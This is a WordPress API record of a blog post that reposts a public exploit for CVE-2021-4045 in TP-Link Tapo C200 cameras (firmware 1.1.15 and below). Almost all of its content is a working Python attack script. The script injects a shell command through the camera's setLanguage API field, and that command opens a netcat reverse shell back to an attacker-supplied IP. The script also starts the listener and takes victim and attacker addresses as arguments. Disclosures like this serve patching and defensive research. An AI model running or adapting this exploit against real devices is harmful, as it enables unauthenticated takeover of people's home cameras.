{"id":31049,"date":"2022-09-23T19:19:06","date_gmt":"2022-09-23T16:19:06","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168472\/tplinktapoc2001115-exec.txt"},"modified":"2022-09-28T15:35:54","modified_gmt":"2022-09-28T12:05:54","slug":"tp-link-tapo-c200-1-1-15-remote-code-execution-tp-link","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/tp-link-tapo-c200-1-1-15-remote-code-execution-tp-link\/","title":{"rendered":"TP-Link Tapo c200 1.1.15 Remote Code Execution TP-Link"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: TP-Link Tapo c200 1.1.15 &#8211; Remote Code Execution (RCE)<br \/>\n# Date: 02\/11\/2022<br \/>\n# Exploit Author: hacefresko<br \/>\n# Vendor Homepage: https:\/\/www.tp-link.com\/en\/home-networking\/cloud-camera\/tapo-c200\/<br \/>\n# Version: 1.1.15 and below<br \/>\n# Tested on: 1.1.11, 1.1.14 and 1.1.15<br \/>\n# CVE : CVE-2021-4045<\/p>\n<p dir=\"ltr\"># Write up of the vulnerability: https:\/\/www.hacefresko.com\/posts\/tp-link-tapo-c200-unauthenticated-rce<\/p>\n<p dir=\"ltr\">import requests, urllib3, sys, threading, os<br \/>\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<\/p>\n<p dir=\"ltr\">PORT = 1337<br \/>\nREVERSE_SHELL = &#8216;rm \/tmp\/f;mknod \/tmp\/f p;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc %s %d &gt;\/tmp\/f&#8217;<br \/>\nNC_COMMAND = &#8216;nc -lv %d&#8217; % PORT # nc command to receive reverse shell (change it depending on your nc version)<\/p>\n<p dir=\"ltr\">if len(sys.argv) &lt; 3:<br \/>\nprint(&#8220;Usage: python3 pwnTapo.py &lt;victim_ip&gt; &lt;attacker_ip&gt;&#8221;)<br \/>\nexit()<\/p>\n<p dir=\"ltr\">victim = sys.argv[1]\nattacker = sys.argv[2]\n<p dir=\"ltr\">print(&#8220;[+] Listening on %d&#8221; % PORT)<br \/>\nt = threading.Thread(target=os.system, args=(NC_COMMAND,))<br \/>\nt.start()<\/p>\n<p dir=\"ltr\">print(&#8220;[+] Serving payload to %s\\n&#8221; % victim)<br \/>\nurl = &#8220;https:\/\/&#8221; + victim + &#8220;:443\/&#8221;<br \/>\njson = {&#8220;method&#8221;: &#8220;setLanguage&#8221;, &#8220;params&#8221;: {&#8220;payload&#8221;: &#8220;&#8216;;&#8221; + REVERSE_SHELL % (attacker, PORT) + &#8220;;'&#8221;}}<br \/>\nrequests.post(url, json=json, verify=False)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: TP-Link Tapo c200 1.1.15 &#8211; Remote Code Execution (RCE) # Date: 02\/11\/2022 # Exploit Author: hacefresko # Vendor Homepage: https:\/\/www.tp-link.com\/en\/home-networking\/cloud-camera\/tapo-c200\/ # Version: 1.1.15 and below # Tested on: 1.1.11, 1.1.14 and 1.1.15 # CVE : CVE-2021-4045 # Write up of the vulnerability: https:\/\/www.hacefresko.com\/posts\/tp-link-tapo-c200-unauthenticated-rce import requests, urllib3, sys, threading, os urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) PORT = &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-31049","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31049","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=31049"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31049\/revisions"}],"predecessor-version":[{"id":31291,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31049\/revisions\/31291"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=31049"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=31049"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=31049"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}